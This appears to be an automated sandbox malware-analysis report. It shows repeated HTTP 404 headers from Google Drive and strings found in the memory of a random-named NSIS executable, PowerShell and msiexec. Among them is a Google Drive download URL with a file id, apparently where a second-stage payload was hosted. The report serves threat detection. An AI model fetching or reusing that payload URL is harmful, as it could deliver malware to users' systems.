Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC54h9p9IrBpDuPfnACo7yUfpSsxQZL_qcJgTpO7yZtlqm-MKYBc2wItF4ucy4Z2P60eWml95GXazgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:44:31 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-7gmziVAhN04C73TTRS4UVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC6WpkrE1dTEJUYvrf3F0J3AHqplaTy679_MyfYxo0DYzRanxSZBBHU8M16l-NY47OEHfaNdnkxraAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:44:37 GMTContent-Security-Policy: script-src 'nonce-5DhTH4YSDDw4HdM0PoGYsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC65Cln_I8TLMf4RVCfAT3Ygs_nejFlHeRcnrQGl_d_cP8989dOR8vXOvbrzzYRBG0VeE039mTIwawServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:44:42 GMTContent-Security-Policy: script-src 'nonce-Q2mJrjB3FJ-sa2acuUDKMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC4sgYGX8MDEjxSc-CtiXmNO-kkPq2NyrH84jAO_8C9qkiyyiyQ4dhpO4Wwe3Go5UG3Uu3Yx3RUV0AServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:44:48 GMTContent-Security-Policy: script-src 'nonce-HhofEG0nNP6P9KUecNOClw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC5WG4ekfceJreGtYog4yN3l62EE0uPVrr_utvRJmE3A4UAjFNZC4DvG1I3QUvMb_a9KC6ZVyZKK_QServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:44:53 GMTContent-Security-Policy: script-src 'nonce-L6Y-BSH-leork-yuznsohg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC5zv0sc2tom8ulZKyxqIXmNLj5ofdZ2C9qHAwERI5s9nUEw0-cdDX1wN1fgk4sMpW5RGiaRolZ8ugServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:44:59 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-5u_aELJgQcxXQRneYHJ_bQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC6q7JIspnS2vBysMyt0_LXY8EGBdX-GFKFfnZcJ9pam3s21yzbqVHekFt0pKhEJQi6DfKc4i1skiAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: AwMu7gR48D.exe, AwMu7gR48D.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: AwMu7gR48D.exe, AwMu7gR48D.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000002.00000002.1850926327.0000000005F05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.1839618822.0000000004FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.1839618822.0000000004EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.1839618822.0000000004FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.1855442072.000000000751A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
      Source: powershell.exe, 00000002.00000002.1839618822.0000000004EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: msiexec.exe, 00000005.00000002.2678783138.000000000625E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1971022665.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.000000000625D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: powershell.exe, 00000002.00000002.1850926327.0000000005F05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.1850926327.0000000005F05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.1850926327.0000000005F05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: msiexec.exe, 00000005.00000002.2678783138.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584795556.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669151935.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472874421.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502712541.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640640069.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613309927.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557277262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=d
      Source: msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/(gv
      Source: msiexec.exe, 00000005.00000003.2111129957.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083732633.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2055895124.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2000433633.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027572606.0000000006259000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/GT
      Source: msiexec.exe, 00000005.00000003.2111145432.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027647702.00000000061DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613416047.00000000061EF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502788314.00000000061DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417445942.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.00000000061DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584889218.00000000061DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083790654.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557342511.00000000061DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221518528.00000000061EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/S
      Source: msiexec.exe, 00000005.00000003.2445831272.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166300357.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584795556.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111129957.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248826838.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138530544.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194101706.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276930704.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669151935.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472874421.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417373844.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359320119.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502712541.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332761660.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640640069.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221471719.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613309927.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557277262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/U
      Source: msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083758915.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472914379.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529948184.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111234763.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613349162.0000000006212000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ertificates
      Source: msiexec.exe, 00000005.00000003.2000450554.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083758915.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027596508.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111234763.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2055912606.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/h
      Source: msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111234763.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ificate
      Source: msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2000450554.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083758915.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472914379.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027596508.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529948184.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111234763.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/n
      Source: msiexec.exe, 00000005.00000003.2332761660.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640640069.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221471719.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613309927.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557277262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rcontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=do
      Source: msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472914379.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529948184.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613349162.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/tAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download
